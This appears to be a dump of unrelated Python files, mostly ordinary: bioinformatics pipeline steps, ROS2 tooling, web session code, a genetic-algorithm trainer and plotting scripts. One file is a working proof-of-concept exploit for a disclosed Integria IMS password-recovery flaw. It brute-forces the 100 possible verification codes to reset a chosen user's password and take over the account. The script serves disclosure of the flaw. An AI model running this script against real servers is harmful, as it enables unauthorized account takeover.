cram_basename = os.path.basename(cram)[:-len(".cram")]
raw_fastq_name = os.path.join(temp_dir, cram_basename)
raw_fastq_names.append(raw_fastq_name)
job_memory = PARAMS["preprocess_memory"]
statement = '''cramtools fastq
--enumerate
--reverse
-F %(raw_fastq_name)s
-I %(cram)s
--gzip
'''
log.write("Extracting fastqs from %(cram)s:" % locals() + "\n")
log.write(statement % locals() + "\n")
P.run(statement)
log.write("done.\n\n")
# ####################################
# Perform quality trimming
# Merging is also taken care of here.
# ####################################
quality = PARAMS["preprocess_quality_threshold"]
minlen = PARAMS["preprocess_min_length"]
trim = PARAMS["preprocess_trim"]
trimmed_fastq_prefix = os.path.join(temp_dir, cell_name)
trimmed_fastq_files = []
# fastq(s) for each end are quality trimmed separately
for end in ["_1", "_2"]:
raw_fastqs = [x + end + ".fastq.gz" for x in raw_fastq_names]
temp_files += raw_fastqs
fastq_list = " ".join(raw_fastqs)
trimmed_fastq_name = trimmed_fastq_prefix + end + ".trimmed.fastq.gz"
trimmed_fastq_files.append(trimmed_fastq_name)
log.write(">> Quality trimming %(fastq_list)s: " % locals() + "\n")
if trim:
statement = '''zcat %(fastq_list)s
| fastq_quality_trimmer
-Q33
-t %(quality)s
-l %(minlen)s
| gzip -c
> %(trimmed_fastq_name)s
'''
else:
statement = '''zcat %(fastq_list)s
| gzip -c
> %(trimmed_fastq_name)s
'''
log.write(statement % _merge_dicts(PARAMS, locals()) + "\n")
P.run(statement)
log.write("done. \n\n")
# ##################
# Reconcile the ends
# ##################
if PARAMS["preprocess_reconcile"] != "False":
temp_files += trimmed_fastq_files
end1, end2 = trimmed_fastq_files
reconciled_fastq_prefix = outfiles[0][:-len(".1.gz")]
log.write(">> Reconciling pairs, %(end1)s & %(end2)s: "
% locals() + "\n")
statement = '''python %(scriptsdir)s/fastqs2fastqs.py
%(end1)s %(end2)s
--method reconcile
--chop
--unpaired
-o "%(reconciled_fastq_prefix)s.%%s.gz";
'''
log.write(statement % _merge_dicts(PARAMS, locals()) + "\n")
P.run(statement)
log.write("done\n\n")
else:
trimmed_fastq_prefix = outfiles[0][:-len(".1.gz")]
for end in trimmed_fastq_files:
if "1.trimmed" in end:
endn = "1"
else:
endn = "2"
trimmed_end_name = ".".join([trimmed_fastq_prefix, endn, "gz"])
os.symlink(os.path.abspath(end), trimmed_end_name)
##############################
# Clean up the temporary files
##############################
if PARAMS["keep_temporary"] == 0:
temp_file_list = " ".join(temp_files)
# record files sizes and md5 checksums of the temporary files
log.write(">> Recording sizes and checksums of temporary files:\n")
statement = '''ls -l %(temp_file_list)s
> %(temp_dir)s/%(cell_name)s.ls;
checkpoint;
md5sum %(temp_file_list)s
> %(temp_dir)s/%(cell_name)s.md5;
'''
log.write(statement % locals() + "\n")
P.run(statement)
log.write("done\n\n")
# unlink (delete) the temporary files
log.write(">> unlinking temporary files: " + temp_file_list + "\n")
for temp_file in temp_files:
os.unlink(temp_file)
log.write("tempororay files unlinked\n")
log.close()
# ---------------------< generic pipeline tasks >---------------------------- #
@follows(cram2fastq, loadCramQuality)
def full():
pass
# ########################################################################### #
if __name__ == "__main__":
sys.exit(P.main(sys.argv))
| StarcoderdataPython |
94712 | # Copyright 2019 Open Source Robotics Foundation, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import sys
from ros2interface.api import type_completer
from ros2interface.verb import VerbExtension
from rosidl_runtime_py import get_interface_path
class ReadStdinPipe(argparse.Action):
"""Get argument from stdin pipe."""
def __call__(self, parser, namespace, values, option_string=None):
if values == '-':
if sys.stdin.isatty():
parser.error('expected stdin pipe')
values = sys.stdin.readline().strip()
if not values:
parser.error('the passed value is empty')
setattr(namespace, self.dest, values)
class ShowVerb(VerbExtension):
"""Output the interface definition."""
def add_arguments(self, parser, cli_name):
arg = parser.add_argument(
'type',
action=ReadStdinPipe,
help="Show an interface definition (e.g. 'example_interfaces/msg/String'). "
"Passing '-' reads the argument from stdin (e.g. "
"'ros2 topic type /chatter | ros2 interface show -').")
arg.completer = type_completer
def main(self, *, args):
try:
file_path = get_interface_path(args.type)
except LookupError as e:
return str(e)
with open(file_path, 'r', encoding='utf-8') as h:
print(h.read().rstrip())
| StarcoderdataPython |
78125 | # -*- coding: utf-8 -*-
import furl
import urllib
import urlparse
import bson.objectid
import httplib as http
from datetime import datetime
import itsdangerous
from flask import request
from werkzeug.local import LocalProxy
from weakref import WeakKeyDictionary
from framework.flask import redirect
from framework.mongo import database
from website import settings
from .model import Session
def add_key_to_url(url, scheme, key):
"""Redirects the user to the requests URL with the given key appended
to the query parameters.
"""
query = request.args.to_dict()
query['view_only'] = key
replacements = {'query': urllib.urlencode(query)}
if scheme:
replacements['scheme'] = scheme
parsed_url = urlparse.urlparse(url)
if parsed_url.fragment:
# Fragments should exists server side so this mean some one set up a # in the url
# WSGI sucks and auto unescapes it so we just shove it back into the path with the escaped hash
replacements['path'] = '{}%23{}'.format(parsed_url.path, parsed_url.fragment)
replacements['fragment'] = ''
parsed_redirect_url = parsed_url._replace(**replacements)
return urlparse.urlunparse(parsed_redirect_url)
def prepare_private_key():
"""`before_request` handler that checks the Referer header to see if the user
is requesting from a view-only link. If so, reappend the view-only key.
NOTE: In order to ensure the execution order of the before_request callbacks,
this is attached in website.app.init_app rather than using
@app.before_request.
"""
# Done if not GET request
if request.method != 'GET':
return
# Done if private_key in args
key_from_args = request.args.get('view_only', '')
if key_from_args:
return
# grab query key from previous request for not login user
if request.referrer:
referrer_parsed = urlparse.urlparse(request.referrer)
scheme = referrer_parsed.scheme
key = urlparse.parse_qs(
urlparse.urlparse(request.referrer).query
).get('view_only')
if key:
key = key[0]
else:
scheme = None
key = None
# Update URL and redirect
if key and not session.is_authenticated:
new_url = add_key_to_url(request.url, scheme, key)
return redirect(new_url, code=http.TEMPORARY_REDIRECT)
def get_session():
session = sessions.get(request._get_current_object())
if not session:
session = Session()
set_session(session)
return session
def set_session(session):
sessions[request._get_current_object()] = session
def create_session(response, data=None):
current_session = get_session()
if current_session:
current_session.data.update(data or {})
current_session.save()
cookie_value = itsdangerous.Signer(settings.SECRET_KEY).sign(current_session._id)
else:
session_id = str(bson.objectid.ObjectId())
session = Session(_id=session_id, data=data or {})
session.save()
cookie_value = itsdangerous.Signer(settings.SECRET_KEY).sign(session_id)
set_session(session)
if response is not None:
response.set_cookie(settings.COOKIE_NAME, value=cookie_value, domain=settings.OSF_COOKIE_DOMAIN)
return response
sessions = WeakKeyDictionary()
session = LocalProxy(get_session)
# Request callbacks
# NOTE: This gets attached in website.app.init_app to ensure correct callback
# order
def before_request():
from framework.auth import cas
# Central Authentication Server Ticket Validation and Authentication
ticket = request.args.get('ticket')
if ticket:
service_url = furl.furl(request.url)
service_url.args.pop('ticket')
# Attempt autn wih CAS, and return a proper redirect response
resp = cas.make_response_from_ticket(ticket=ticket, service_url=service_url.url)
if request.cookies.get(settings.COOKIE_NAME):
# TODO: Delete legacy cookie, this special case can be removed anytime after 1/1/2016.
# A cookie is received which could potentially be a legacy (pre multi-domain) cookie.
# Issuing a targeted delete of the legacy cookie ensures the user does not end up in a
# login loop whereby both cookies are sent to the server and one of them at random
# read for authentication.
resp.delete_cookie(settings.COOKIE_NAME, domain=None)
return resp
if request.authorization:
# TODO: Fix circular import
from framework.auth.core import get_user
user = get_user(
email=request.authorization.username,
password=request.authorization.password
)
# Create empty session
# TODO: Shoudn't need to create a session for Basic Auth
session = Session()
set_session(session)
if user:
user_addon = user.get_addon('twofactor')
if user_addon and user_addon.is_confirmed:
otp = request.headers.get('X-OSF-OTP')
if otp is None or not user_addon.verify_code(otp):
# Must specify two-factor authentication OTP code or invalid two-factor
# authentication OTP code.
session.data['auth_error_code'] = http.UNAUTHORIZED
return
session.data['auth_user_username'] = user.username
session.data['auth_user_id'] = user._primary_key
session.data['auth_user_fullname'] = user.fullname
else:
# Invalid key: Not found in database
session.data['auth_error_code'] = http.UNAUTHORIZED
return
cookie = request.cookies.get(settings.COOKIE_NAME)
if cookie:
try:
session_id = itsdangerous.Signer(settings.SECRET_KEY).unsign(cookie)
session = Session.load(session_id) or Session(_id=session_id)
except itsdangerous.BadData:
return
if session.data.get('auth_user_id') and 'api' not in request.url:
database['user'].update({'_id': session.data.get('auth_user_id')}, {'$set': {'date_last_login': datetime.utcnow()}}, w=0)
set_session(session)
def after_request(response):
if session.data.get('auth_user_id'):
session.save()
return response
| StarcoderdataPython |
3274402 | <gh_stars>0
import codecs
import numpy as np
import random
from copy import deepcopy
categories = ['science', 'style', 'culture', 'life', 'economics', 'business', 'travel', 'forces', 'media', 'sport']
dict_file = codecs.open('processed/dictionary.txt', 'r', 'utf_8_sig')
dictionary = []
for line in dict_file:
line = line[: len(line) - 1]
dictionary.append(line)
dl = len(dictionary)
neuron_number = 1
weights = [[[0 for i in range(neuron_number)] for j in range(dl)], [[0 for i in range(dl)] for j in range(neuron_number)]]
train_vectors_i = codecs.open('processed/train_vectors_input.txt', 'r', 'utf_8_sig')
train_vectors_o = codecs.open('processed/train_vectors_outputs.txt', 'r', 'utf_8_sig')
input_vectors = []
outputs = []
for line in train_vectors_i:
line2 = line[1:-2]
input_vector = line2.split(', ')
input_vectors.extend([[int(i) for i in input_vector]])
for line in train_vectors_o:
line2 = line[1:-2]
output_vector = line2.split(', ')
outputs.extend([[int(i) for i in output_vector]])
print('read')
'''
dl = 2
neuron_number = 3
'''
def ReLU(x, coef = 1):
if x >=0:
return x * coef
else:
return 0
def classify(output_vector):
return categories[output_vector.index(max(output_vector))]
def propogation(input_vector, weights, dictionary_length = dl, neuron_number = neuron_number, activation_function = ReLU):
hidden_layer = [0] * neuron_number
for i in range(neuron_number):
neuron = 0
for j in range(dictionary_length):
neuron += input_vector[j] * weights[0][j][i]
neuron = activation_function(neuron)
hidden_layer[i] = neuron
output_vector = [0] * 10
for i in range(10):
output = 0
for j in range(neuron_number):
output += hidden_layer[j] * weights[1][j][i]
output = activation_function(output)
output_vector[i] = output
return output_vector
def calculate_indices(list_, d = 0.05):
indices = []
for i in range(int(len(list_)/(1/d))):
index = random.randint(0, int(len(outputs)) - 1)
indices.extend([index])
return indices
def calculate_accuracy(inputs, outputs, weights, indices, dictionary_length = dl, neuron_number = neuron_number, activation_function = ReLU):
TN_TP = 0
TN_TP_FP_FN = 0
for i in indices:
TN_TP_FP_FN += 1
if classify(propogation(inputs[i], weights)) == classify(outputs[i]):
TN_TP += 1
return TN_TP/TN_TP_FP_FN
def crossed(wights1, weights2):
w1 = deepcopy(wights1)
w2 = deepcopy(weights2)
w3 = deepcopy(wights1)
for i in range(len(wights1)):
for j in range(len(wights1[i])):
for k in range(len(wights1[i][j])):
if int((i+j+k)%2) == 1:
w3[i][j][k] = w1[i][j][k]
else:
w3[i][j][k] = w2[i][j][k]
return w3
def mutate(weights, percentage = .4, rate = 2, probabilty = .1):
p = random.randint(0, 100) / 100
if p < probabilty:
return weights
weights_unpacked = []
for i in range(len(weights)):
for j in range(len(weights[i])):
for k in range(len(weights[i][j])):
weights_unpacked.append(weights[i][j][k])
for i in range(int(len(weights_unpacked) * percentage)):
index = random.randrange(0, len(weights_unpacked))
weights_unpacked[index] += random.randrange(int(-rate * 100), int(rate * 100)) / 100
for i in range(len(weights)):
for j in range(len(weights[i])):
for k in range(len(weights[i][j])):
weights[i][j][k] = weights_unpacked[i+j+k]
return weights
def train(input_vectors, outputs, population_count = 10, epochs = 1):
global dl
global neuron_number
random_range = 2
#generating
population = [[] for i in range(population_count)]
for i in range(population_count):
population[i] = [[[0 for i in range(neuron_number)] for j in range(dl)], [[0 for i in range(10)] for j in range(neuron_number)]]
for j in range(len(population[i])):
for k in range(len(population[i][j])):
for l in range(len(population[i][j][k])):
population[i][j][k][l] = random.randrange(-random_range * 100, random_range * 100) / 100
for e in range(epochs):
#crossing
new_population = []
for i in range(population_count):
for j in range(i+1, population_count):
new_population.extend([crossed(population[i], population[j])])
#mutating
for w in new_population:
w = mutate(w)
#selecting
survived = []
measured = []
for j in new_population:
indices = calculate_indices(outputs)
measured.extend([calculate_accuracy(input_vectors, outputs, j, indices)])
print('N: {}/{}, ACC: {}, last: {}'.format(new_population.index(j), len(new_population), "%.3f" % max(measured),"%.3f" % measured[-1]))
for i in range(population_count):
survived.extend([new_population[measured.index(max(measured))]])
new_population.remove(new_population[measured.index(max(measured))])
measured.remove(max(measured))
res_for_this_epoch = calculate_accuracy(input_vectors, outputs, survived[0], range(len(outputs)))
population = survived[:]
print('epoch {} finished with accuracy {}'.format(e, res_for_this_epoch))
#train([[[0,0,0],[0,0,0]], [[0],[0],[0]]], [[1, 2],[1, 3],[2, 2],[2, 3],[3, 3]], [3, 4, 4, 5, 6], epochs = 5)
train(input_vectors, outputs, epochs=1000) | StarcoderdataPython |
1717293 | #!/usr/bin/env python3
import fileinput
import datetime
import os
today = datetime.date.today()
with open("/root/birthdays.txt") as file:
next(file)
raw = []
for line in file:
raw.append(tuple(line.split()))
names = [' '.join(i[2:]) for i in raw]
start = [(int(i[0]),int(i[1])) for i in raw]
end = start[:]
for t in range(len(end)):
end[t] = (end[t][0],end[t][1]+1)
for d in range(len(start)):
if (today.month,today.day) == start[d]:
with fileinput.FileInput("/home/webby/doushio/imager/config.js", inplace=True, backup='.bak') as file:
for line in file:
print(line.replace("IMAGE_HATS: false", "IMAGE_HATS: true"), end="")
with fileinput.FileInput("/home/webby/doushio/hot.js", inplace=True, backup='.bak') as file:
for line in file:
if "CUSTOM_BANNER_TOP:" in line:
print(' CUSTOM_BANNER_TOP: "Happy Birthday ' + names[d] + '!",', end="")
else:
print(line, end="")
if (today.month,today.day) == end[d]:
with fileinput.FileInput("/home/webby/doushio/imager/config.js", inplace=True, backup='.bak') as file:
for line in file:
print(line.replace("IMAGE_HATS: true", "IMAGE_HATS: false"), end="")
os.rename("/home/webby/doushio/hot.js.bak","/home/webby/doushio/hot.js") | StarcoderdataPython |
1762661 | # Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved.
from __future__ import absolute_import
from . import boundingBox
from . import imageGradients
from . import rawData
view_extensions = [
# Set show=True if extension should be shown by default
# in the 'Select Visualization Method' dialog. These defaults
# can be changed by editing DIGITS config option
# 'view_extension_list'
{'class': boundingBox.Visualization, 'show': True},
{'class': imageGradients.Visualization, 'show': False},
{'class': rawData.Visualization, 'show': True},
]
def get_default_extension():
"""
return the default view extension
"""
return rawData.Visualization
def get_extensions(show_all=False):
"""
return set of data data extensions
"""
return [extension['class']
for extension in view_extensions
if show_all or extension['show']]
def get_extension(extension_id):
"""
return extension associated with specified extension_id
"""
for extension in view_extensions:
extension_class = extension['class']
if extension_class.get_id() == extension_id:
return extension_class
return None
| StarcoderdataPython |
43519 | <filename>backend/unpp_api/apps/partner/migrations/0017_auto_20170920_0639.py
# -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-09-20 06:39
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('partner', '0016_auto_20170920_0340'),
]
operations = [
migrations.AlterField(
model_name='partnerprofile',
name='year_establishment',
field=models.PositiveSmallIntegerField(blank=True, help_text='Enter valid year.', null=True, verbose_name='Year of establishment'),
),
]
| StarcoderdataPython |
1700522 | '''
* Vendor: Artica Soluciones Tecnologicas
* Product: Integria IMS Server
* Version: 5.0 MR56 Package 58 and probably earlier
* Category: CWE-640 Weak Password Recovery Mechanism
* Reported: 3/14/17
* Patched: 6/20/17
* Disclosed: 5/14/18
* Researcher: <NAME>
* CVE: TBD
* Reference: https://cp270.wordpress.com/2018/05/14/war-story-password-resets/
* Reference: https://github.com/articaST/integriaims/commit/f2ff0ba821644acecb893483c86a9c4d3bb75047
!!!! DO NOT USE without proper authorization !!!!
The Integria IMS password recovery function generates and emails a verification code to users who forget their password. The function has two flaws:
- Innsufficient randomness (for any given user there are only 100 possible codes)
- Lack of brute force protection
This script exploits these complimentary flaws by initiating the password recovery process for a given user, then trying all 100 possible codes until it finds the correct one.
The verification code is an MD5 hash in the following format:
MD5(sitename + [random number between 0 and 100] + username)
The sitename is the <title> of the external-facing login HTML page and is automatically parsed by this script.
Thus, all that is needed to gain access to a user's account is their username.
'''
import requests, sys, hashlib
from optparse import OptionParser
debug = False
# parse the Sitename from the login page HTML text
# the Sitename is the <title> of the page
def getSiteName(htmlText):
startTitle = htmlText.index("<title>")
endTitle = htmlText.index("</title>")
sitename = htmlText[startTitle + len("<title>"):endTitle]
return sitename
# parse the new password from the successful verification code page
def getNewPassword(htmlText):
startFlag = "Your new password is : <b>"
endFlag = "</b></div>"
startNewPass = htmlText.index(startFlag)
endNewPass = htmlText[startNewPass:].index(endFlag)
newPass = htmlText[startNewPass + len(startFlag):startNewPass + endNewPass]
#print htmlText
return newPass
def printMain():
print 'Integria IMS user account takeover script'
print '!!!! DO NOT USE without proper authorization !!!!'
# Start main code
parser = OptionParser('Usage: takeover.py -s [server name or IP] -u [target username]\nExample: takeover.py -s http://192.168.1.45/integria -u root')
# setup option parsing
parser.add_option("-s", "--server", dest="server", help="URL to target, excluding any specific page. Example: http://example.com/integriaims")
parser.add_option("-u", "--username", dest="username", help="Username to takeover")
parser.add_option("-d", "--debug", dest="debug", action="store_true", help="Turn on debug output")
(options, args) = parser.parse_args()
success = False
debug = options.debug
server = options.server
username = options.username
# if no server or username are supplied then tell the operator and exit
if (server == None ):
print '[!] You must supply the target IntegriaIMS server hostname or IP address'
print parser.usage
exit()
if (username == None):
print '[!] You must supply a username to takeover'
print parser.usage
exit()
# print the disclaimer and usage information
printMain()
print '[ ] Hijacking account \'' + username + '\' on ' + server
#start by getting the sitename (is the <title> of the default login page)
if (debug):
print "[d] Retrieving sitename..."
r = requests.get(server)
sitename = getSiteName(r.text)
if (debug):
print "[d] Found sitename: " + sitename
#trigger the password recovery process on the Integria server
print "[ ] Triggering password recovery procedure..."
r = requests.get(server + "/index.php?recover=" + username)
if ("Don't close this window:" in r.text):
print "[ ] Password reset process triggered successfully" #Successfully got the server to generate a verificaiton code. Now we can try to brute force it
# loop through each of the 100 possible codes and try it
print "[ ] Generating and trying 100 codes, please wait..."
for x in range(0, 100):
#create the code
m = hashlib.md5()
m.update(sitename + str(x) + username)
testhash = m.hexdigest()
# send the code to the server
r = requests.post(server + '/index.php?recover=' + username, data={'hash' : testhash})
if ('Invalid' not in r.text):
#success, this was the verification code. Print it along with the new password (which is contained in the response HTML page)
print '[+] Success! Account \'' + username + '\' new password: ' + getNewPassword(r.text)
if (debug):
print '[d] Verification code: ' + testhash
success = True
break
# else it wasn't the correct code, loop back around and try the next one
else:
print '[-] Failed to start password reset process'
if (debug):
print '[d] Code=' + str(r.status_code) + ' response text from server=' + r.text
# failure, for whatever reason we didn't reset the password
if (success == False):
print "[-] Password was not found, please try running the script again (is the target version vulnerable?)"
print "[ ] Operations complete"
| StarcoderdataPython |
168340 | <filename>pdsf_py2/pydysofu/fuzz_weaver.py
"""
Core fuzzing functionality.
@author twsswt
"""
import ast
import copy
import inspect
from core_fuzzers import identity
from workflow_transformer import WorkflowTransformer
from drawer import weave_clazz, weave_module, unweave_class, unweave_all_classes, IdentityAspect
_reference_syntax_trees = dict()
def get_reference_syntax_tree(func):
if func not in _reference_syntax_trees:
func_source_lines = inspect.getsourcelines(func)[0]
global_indentation = len(func_source_lines[0]) - len(func_source_lines[0].strip())
for i in range(len(func_source_lines)):
func_source_lines[i] = func_source_lines[i][global_indentation - 1:]
func_source = ''.join(func_source_lines)
_reference_syntax_trees[func] = ast.parse(func_source)
return _reference_syntax_trees[func]
def fuzz_function(reference_function, fuzzer=identity, context=None):
reference_syntax_tree = get_reference_syntax_tree(reference_function)
fuzzed_syntax_tree = copy.deepcopy(reference_syntax_tree)
workflow_transformer = WorkflowTransformer(fuzzer=fuzzer, context=context)
workflow_transformer.visit(fuzzed_syntax_tree)
# Compile the newly mutated function into a module, extract the mutated function code object and replace the
# reference function's code object for this call.
compiled_module = compile(fuzzed_syntax_tree, inspect.getsourcefile(reference_function), 'exec')
reference_function.func_code = compiled_module.co_consts[0]
class FuzzingAspect(IdentityAspect):
def __init__(self, fuzzing_advice):
self.fuzzing_advice = fuzzing_advice
def prelude(self, attribute, context, *args, **kwargs):
self.apply_fuzzing(attribute, context)
def apply_fuzzing(self, attribute, context):
# Ensure that advice key is unbound method for instance methods.
if inspect.ismethod(attribute):
reference_function = attribute.im_func
advice_key = getattr(attribute.im_class, attribute.func_name)
else:
reference_function = attribute
advice_key = reference_function
fuzzer = self.fuzzing_advice.get(advice_key, identity)
fuzz_function(reference_function, fuzzer, context)
def fuzz_clazz(clazz, fuzzing_advice):
fuzzing_aspect = FuzzingAspect(fuzzing_advice)
advice = {k: fuzzing_aspect for k in fuzzing_advice.keys()}
weave_clazz(clazz, advice)
def defuzz_class(clazz):
unweave_class(clazz)
def defuzz_all_classes():
unweave_all_classes()
def fuzz_module(mod, advice):
weave_module(mod, advice)
| StarcoderdataPython |
3212911 |
# to plot on the same figure ppo, ddpg and td3 for unused and unsatisfied
# 1 simple
# 2 multiple agent
# plot reward of simple / multi-agent / rsu
"""
# 1***Simple agent *****
import matplotlib.pyplot as plt
import pickle
var = "rc"
pdf_plot = var # R_c, C_o, C_u, k
lstt = [var]#, "C_o", "C_u", "k"]
for pdf_plot in lstt:
with open('z_20ep_resources_'+var+'_ppo.data', 'rb') as filehandle: # 1_ddpg4442C_o #07_five_rc_all_'+var+'.data'
# read the data as binary data stream
ppo = pickle.load(filehandle)
zipped_lists = zip(ppo[0], ppo[1]) # zip of unused shared and own resources
ppo_unused = [x + y for (x, y) in zipped_lists] # sum list
zipped_lists = zip(ppo[2], ppo[3])
ppo_unsatisfied = [x + y for (x, y) in zipped_lists]
with open('z_20ep_resources_'+var+'_ddpg.data', 'rb') as filehandle: # 02_five_fifty_R_c.data
# read the data as binary data stream
ddpg =pickle.load(filehandle)
zipped_lists = zip(ddpg[0], ddpg[1]) # zip of unused shared and own resources
ddpg_unused = [x + y for (x, y) in zipped_lists] # sum list
zipped_lists = zip(ddpg[2], ddpg[3]) # zip of unused shared and own resources
ddpg_unsatisfied = [x + y for (x, y) in zipped_lists] # sum list
with open('z_20ep_resources_'+var+'_td3.data', 'rb') as filehandle: # 1_ddpg4442C_o
# read the data as binary data stream
td3 = pickle.load(filehandle)
zipped_lists = zip(td3[0], td3[1]) # zip of unused shared and own resources
td3_unused = [x + y for (x, y) in zipped_lists] # sum list
zipped_lists = zip(td3[2], td3[3]) # zip of unused shared and own resources
td3_unsatisfied = [x + y for (x, y) in zipped_lists] # sum list
times = [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]
plt.plot(times , ppo_unused, color='orange', linestyle='dotted', marker='x' ,label='PPO_unused') # unused shared 'ppo_$Unused$'
plt.plot(times , ddpg_unused, color='red', linestyle='dashed', marker='D' ,label='DDPG_unused') # unused shared
plt.plot(times , td3_unused, color='blue', linestyle='--', marker='2' ,label='TD3_unused') # unused shared
plt.plot(times , ppo_unsatisfied, color='green', linestyle='dotted', marker='s' ,label='PPO_unsatisfied') # unused shared 'ppo_$Unused$'
plt.plot(times , ddpg_unsatisfied, color='pink', linestyle='solid', marker='<' ,label='DDPG_unsatisfied') # unused shared
plt.plot(times , td3_unsatisfied, color='brown', linestyle='--', marker='2' ,label='TD3_unsatisfied') # unused shared
plt.ylabel('Caching Resources', size= 8 ) #resource
plt.xlabel('$'+var+'$', size= 10) #'$'+pdf_plot[para]+'$ ' $'+var+'$ Communication range
plt.xticks((1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20),size = 7)
plt.yticks(size = 7)
plt.grid()
plt.legend()#ncol=1, bbox_to_anchor=(1, 0.5))#c_u
plt.grid()
plt.savefig('zz_caching_'+var+'_g+o_z.pdf') #abbbs_ b_test_five_'+var+'_plot.pdf
#plt.show()
print("EEND")
print("End")
"""
"""
# 2***multi agent *****
import matplotlib.pyplot as plt
import pickle
var = "rc"
pdf_plot = var # R_c, C_o, C_u, k
lstt = [var]#, "C_o", "C_u", "k"]
for pdf_plot in lstt:
with open('z_20ep_multi_agent_'+var+'_ppo.data', 'rb') as filehandle: # 1_ddpg4442C_o #07_five_rc_all_'+var+'.data'
# read the data as binary data stream
ppo = pickle.load(filehandle)
zipped_lists = zip(ppo[0], ppo[1]) # zip of unused shared and own resources
ppo_unused = [x + y for (x, y) in zipped_lists] # sum list
zipped_lists = zip(ppo[2], ppo[3])
ppo_unsatisfied = [x + y for (x, y) in zipped_lists]
with open('z_20ep_multi_agent_'+var+'_ddpg.data', 'rb') as filehandle: # 02_five_fifty_R_c.data
# read the data as binary data stream
ddpg =pickle.load(filehandle)
zipped_lists = zip(ddpg[0], ddpg[1]) # zip of unused shared and own resources
ddpg_unused = [x + y for (x, y) in zipped_lists] # sum list
zipped_lists = zip(ddpg[2], ddpg[3]) # zip of unused shared and own resources
ddpg_unsatisfied = [x + y for (x, y) in zipped_lists] # sum list
with open('z_20ep_multi_agent_'+var+'_td3.data', 'rb') as filehandle: # 1_ddpg4442C_o
# read the data as binary data stream
td3 = pickle.load(filehandle)
zipped_lists = zip(td3[0], td3[1]) # zip of unused shared and own resources
td3_unused = [x + y for (x, y) in zipped_lists] # sum list
zipped_lists = zip(td3[2], td3[3]) # zip of unused shared and own resources
td3_unsatisfied = [x + y for (x, y) in zipped_lists] # sum list
times = [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]
plt.plot(times , ppo_unused, color='orange', linestyle='dotted', marker='x' ,label='PPO_unused') # unused shared 'ppo_$Unused$'
plt.plot(times , ddpg_unused, color='red', linestyle='dashed', marker='D' ,label='DDPG_unused') # unused shared
plt.plot(times , td3_unused, color='blue', linestyle='--', marker='2' ,label='TD3_unused') # unused shared
plt.plot(times , ppo_unsatisfied, color='green', linestyle='dotted', marker='s' ,label='PPO_unsatisfied') # unused shared 'ppo_$Unused$'
plt.plot(times , ddpg_unsatisfied, color='pink', linestyle='solid', marker='<' ,label='DDPG_unsatisfied') # unused shared
plt.plot(times , td3_unsatisfied, color='brown', linestyle='--', marker='2' ,label='TD3_unsatisfied') # unused shared
plt.ylabel('Caching Resources', size= 8 ) #resource
plt.xlabel('$'+var+'$', size= 10) #'$'+pdf_plot[para]+'$ ' $'+var+'$ Communication range
plt.xticks((1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20),size = 7)
plt.yticks(size = 7)
plt.grid()
plt.legend()#ncol=1, bbox_to_anchor=(1, 0.5))#c_u
plt.grid()
plt.savefig('zz_multi_caching_'+var+'_g+o_z.pdf') #abbbs_ b_test_five_'+var+'_plot.pdf
#plt.show()
print("End")
"""
"""
# 3***reward simple / multi-agent / rsu *****
import matplotlib.pyplot as plt
import pickle
import numpy as np
var = "k"
pdf_plot = var # R_c, C_o, C_u, k
lstt = [var]#, "C_o", "C_u", "k"]
print("okokokok")
for pdf_plot in lstt:
with open('Reward_ppo.data', 'rb') as filehandle: # 1_ddpg4442C_o #07_five_rc_all_'+var+'.data'
# read the data as binary data stream
single = pickle.load(filehandle)
single = single[0][:219999]
window_width= 100
cumsum_vec = np.cumsum(np.insert(single, 0, 0))
single = (cumsum_vec[window_width:] - cumsum_vec[:-window_width]) / window_width
with open('Reward_multi_agentppo.data', 'rb') as filehandle: # 02_five_fifty_R_c.data
# read the data as binary data stream
multi =pickle.load(filehandle)
multi = multi[0][:219999]
window_width= 100
cumsum_vec = np.cumsum(np.insert(multi, 0, 0))
multi = (cumsum_vec[window_width:] - cumsum_vec[:-window_width]) / window_width
with open('Reward_multi_agent_RSUppo.data', 'rb') as filehandle: # 1_ddpg4442C_o
# read the data as binary data stream
rsu = pickle.load(filehandle)
rsu = rsu[0][:219999]
window_width= 100
cumsum_vec = np.cumsum(np.insert(multi, 0, 0))
multi = (cumsum_vec[window_width:] - cumsum_vec[:-window_width]) / window_width
plt.plot(single, color='orange', linestyle='dotted', marker='x' ,label='Single_agent') # unused shared 'ppo_$Unused$'
plt.plot(multi, color='red', linestyle='dashed', marker='D' ,label='Multi_agent') # unused shared
plt.plot(rsu, color='blue', linestyle='--', marker='2' ,label='Multi_agent_RSU') # unused shared
plt.ylabel('Reward', size= 8 ) #resource
plt.xlabel('Epochs', size= 10) #'$'+pdf_plot[para]+'$ ' $'+var+'$ Communication range
#plt.xticks((1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20),size = 7)
plt.yticks(size = 7)
plt.grid()
plt.legend()#ncol=1, bbox_to_anchor=(1, 0.5))#c_u
plt.grid()
plt.savefig('zz_reward_all.pdf') #abbbs_ b_test_five_'+var+'_plot.pdf
#plt.show()
print("End")
"""
import matplotlib.pyplot as plt
import numpy as np
import pickle
with open('Reward_ppo.data', 'rb') as filehandle: # 1_ddpg4442C_o #07_five_rc_all_'+var+'.data'
# read the data as binary data stream
single = pickle.load(filehandle)
print("LEN SINGLE = ", len(single[0]))
single = single[0][:20000]
single = [ single[xx] for xx in range(len(single)) if xx%20==0 ]
window_width= 100
cumsum_vec = np.cumsum(np.insert(single, 0, 0))
single = (cumsum_vec[window_width:] - cumsum_vec[:-window_width]) / window_width
with open('Reward_multi_agentppo.data', 'rb') as filehandle: # 1_ddpg4442C_o #07_five_rc_all_'+var+'.data'
# read the data as binary data stream
multi = pickle.load(filehandle)
print("LEN multi = ", len(multi[0]))
multi = multi[0][:20000]
